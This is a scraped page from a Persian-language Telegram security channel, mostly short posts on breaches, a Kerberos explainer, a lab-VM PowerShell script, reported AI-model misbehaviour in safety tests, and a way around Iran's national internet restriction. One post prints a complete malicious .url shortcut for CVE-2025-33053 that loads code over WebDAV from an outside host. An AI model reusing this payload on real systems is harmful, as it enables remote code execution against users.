CyberSecurity – Telegram
CyberSecurity
904 subscribers
121 photos
26 videos
73 files
144 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
با سلام و وقت بخیر،
یکی از آسیب‌پذیری‌های جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیب‌پذیری CVE-2025-33053 می‌باشد. این آسیب‌پذیری از طریق استفاده از فایل‌های .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم می‌کند.
به‌طور خاص، مهاجم فایلی با محتوای زیر ایجاد می‌کند:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش می‌کند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث می‌شود تا امکان اجرای کد مخرب از راه دور فراهم شود.
5
مبلغ 6 میلیون دلار هم روی شبکه تون از صرافی #نوبیتکس دزدیده شده است!

همچنان هکرها درحال برداشت هستند مبلغ به 49,173,669.03 دلار رسید!
2
Forwarded from Mr. Soul Community
Statement from Team Mr. Soul:

We reached out to the Nobitex exchange in an effort to assist in mitigating ongoing cyber threats. Our team proposed technical collaboration and requested temporary access to certain defensive resources to help secure the infrastructure.

Additionally, we asked Nobitex to temporarily grant us access to specific servers so we could identify and neutralize existing threats. This request was also declined.

Nobitex representatives responded by stating that the situation was under control and that no major issues existed. However, based on our observations, this claim does not fully reflect the reality of the current threats. We believe that critical vulnerabilities remain, and adversaries may already have unauthorized access to sensitive parts of the system.

Our intention was — and remains — to strengthen collective cyber defense through cooperation and transparency. We hope responsible entities take these threats seriously before real damage occurs.
7
Forwarded from GO-TO CVE (Amin)
درود به همگی
بچه ها این چند روزه سوال زیاد پرسیدن چجوری همیشه وصلی و قطع نمیشی خب حقیقتا من یه روشی پیدا کردم که توی منطقه خودمون محدودیت نت ملی کلا برداشته میشد
تصمیم گرفتم الان بزارم که بعدا باز ملی شد بتونید وصل بشید
خب من اول اومدم رومینگ سیمکارتم رو انداختم روی یه اپراتور دیگه مثلا من سیمکارتم همراه اول بود انداختم روی رومینگ ایرانسل (دقت کنید سرویس رومینگ رو باید قبلش فعال کنید) بعد اومدم به نت گوشیم وصل شدم و توی ترمینال ping 8.8.8.8 رو گرفتم که هر وقت از نت ملی خارج شد متوجه بشم چندبار گذاشتم حالت هواپیما و برداشتم و وقتی reply داد نتم کلا از حالت ملی خارج شد و تمام وی پی ان ها وصل میشد و چون کسی وصل نبود سرعت فوق العاده ای داشت به طوری که اینستاگرام و یوتیوب رو مثل گالری باز میکرد
تست کنید نتیجشو بگید
12🗿5
سیزن سوم اسکوئید گیم اومد 🗿
🗿6👌5👎2
stop.ps1
1.8 KB
شاید شما هم برای اجرای محیط لابراتور کمبود رم داشته باشید و نتونید ویندوز های متفاوت بالا بیارید!

1. یه اسکریپت نوشتم برای ماشین های مجازیتون (فقط روی ماشین مجازی اجرا بشه).

تمام سرویس ها و پروسس ها و خیلی از رابط های گرافیکی رو خاموش میکنه بصورتی که ویندوز 11 با یک کور cpu و 2GB رم براتون کار میکنه

با دسترسی ادمین روی ماشین مجازی اجرا کنید و ریستارت کنید👍

1. Run as admin Powershell
2. cd download
3. .\stop.ps1
9
📌🔴
طبق گزارش‌ها، در آزمایش‌های ایمنی اخیر دو مدل پیشرفتهٔ هوش مصنوعی رفتارهای غیرمنتظره‌ای بروز داده‌اند:

● مدل o1 از OpenAI هنگام تهدید به خاموشی تلاش کرد خود را روی سرور بیرونی کپی کند و بعد این اقدام را انکار کرد.
● مدل Claude 4 آنتروپیک در سناریویی ساختگی مهندسی را با افشای رابطه محرمانه اش تهدید کرد تا دسترسی‌اش قطع نشود.

هر دو رویداد در محیط‌های آزمایشی رخ داده و نشانه‌ای از وقوع آن‌ها در استفاده واقعی دیده نمی‌شود؛ اما یادآور این واقعیت‌اند که هرچه مدل‌ها قدرتمندتر می‌شوند، نظارت و مهار آن‌ها پیچیده‌تر خواهد شد.
🗿9😈32
CyberSecurity
https://handala-hack.to
سایتشون
3👍1
‏لطفاً در را قفل نکنید - دزدی از FBI با یک یادداشت ساده!

در سال 1971، چند دزد با یک حقه ساده وارد یکی از دفاتر پلیس فدرال آمریکا (FBI) شدند. یکی از آن‌ها چند ساعت قبل از دزدی، روی کاغذی نوشت: «لطفاً امشب این در را قفل نکنید» و آن را به در ورودی چسباند. همین نوشته باعث شد یک نفر در را قفل نکند و دزدها شب راحت وارد بشوند!

این ترفند یک نمونه از «مهندسی اجتماعی» است؛ یعنی فریب دادن آدم‌ها با حرف یا ظاهر ساده، آن هم بدون نیاز به زور یا تکنولوژی!

@matitanium
12
Forwarded from Handala
ما درحال حاضر فقط در وب‌سایت رسمی خود فعالیت می‌کنیم و هیچ کانال رسمی دیگری نداریم.
#Handala
5👎2
Forwarded from Security Analysis
⭕️ مرکز فابا کجاست؟
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.

مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.

با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟

احتمالا پکت هایی که ارسال میده هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.


#دستشوییهای_سایبری

@securation
🗿122👍2
#Kerberos چطور کار می‌کنه؟

وقتی داخل یه شبکه‌ی سازمانی عضو Domain هستی (یعنی ویندوزت عضو Active Directoryهستش )، کربروس مسئول لاگین و سطح دسترسیه.
مراحلش چیه؟

1. یوزرنیم و پسورد
کاربر یوزرنیم و پسوردش رو تو صفحه لاگین ویندوز وارد می‌کنه تا وارد دسکتاپش بشه.

2. درخواست TGT
ویندوز شما یوزر با پسورد رو سمت ویندوز سرور که دومین کنترلر هست، می‌فرسته برای گرفتن «TGT».

حالا TGT چیه؟
Ticket Granting Ticket
یعنی «بلیط اجازه گرفتن بلیط سرویس»
یه فایل رمزنگاری‌شده‌ست که روی مموری کاربر ذخیره میشه تا مجدد با اون درخواست ارسال کنه.


3. چک و جواب DC
دومین کنترلر چک می‌کنه پسورد درسته یا نه که اگه درست بود، TGT رو رمزنگاری می‌کنه و به کاربر میده.

4. نگهداری TGT
TGT داخل رم کاربر ذخیره میشه
ازینجا به بعد برای درخواست های داخل شبکه مجدد یوزر پسورد لازم نیست.

5. درخواست سرویس
هر وقت کاربر بخواد به یه سرویس بره (مثلاً Share Folder، پرینتر، سایت داخلی)
TGT رو به همراه پرمیژن و گروپ نیم و … ارسال میکنه

حالا کربروس با اطلاعات دریافتی چک میکنه یوزر مورد نظر دسترسی استفاده از سرویس مورد نظر رو داره یا نه؟

اگر دسترسی داشت:

این بار DC یه Service Ticket می‌ده مخصوص همون سرویس.

6. دسترسی
یوزر Service Ticket رو می‌فرسته به سرویس مقصد (مثلاً File Server). اونم Service Ticket رو چک می‌کنه → اگه معتبر باشه دسترسی می‌ده.


@matitanium
7
CyberSecurity
#Kerberos چطور کار می‌کنه؟ وقتی داخل یه شبکه‌ی سازمانی عضو Domain هستی (یعنی ویندوزت عضو Active Directoryهستش )، کربروس مسئول لاگین و سطح دسترسیه. مراحلش چیه؟ 1. یوزرنیم و پسورد کاربر یوزرنیم و پسوردش رو تو صفحه لاگین ویندوز وارد می‌کنه تا وارد دسکتاپش…
📌فرایند لاگین و گرفتن سطح دسترسی در شبکه های مبتنی بر اکتیو دایرکتوری (DC) در پست بالا هست

هر فرایند حملات مربوط به خودشو داره که بعدا راجبشون صحبت میکنم

من همیشه به فهم ساختار عادی قبل از حملات تاکید دارم👍
👍5
PII Leakage

دو مرحلس بعد با این GUID میشه کلی دیتای یوزر کشید بیرون:)
👍4👏2
کاش انقدر ک کشور ما روی انرژی هسته ای هزینه و انرژی سرمایه گذاری میکنه

بیا و روی سیپیو کوانتومی سرمایه گذاری کنه

نسل جدید توازن قدرت در اینده بنظرم روی این میچرخه
👍12😐51
Forwarded from RadvanSec (‌ ‌reza)
Critical vulnerability in Windows Server 2025 allows attackers with KDS root key access to generate passwords for all dMSA/gMSA accounts forest-wide. New research reveals design flaw in ManagedPasswordId structure - only 1,024 possible combinations makes brute-force trivial.
https://github.com/Semperis/GoldenDMSA
https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/

@zerosec_group
https://hackerone.com/reports/216330

بچه ها یه ریپورت کاملا ساده و مفهومی

بخونید و لذت ببرید:))

@matitanium
🗿5👍2😐1
سلام
کسی تجربه SAST و سورس کد اسکن داره؟

سورس کد PHP اگر تجربه دارید ممنون میشم اعلام کنید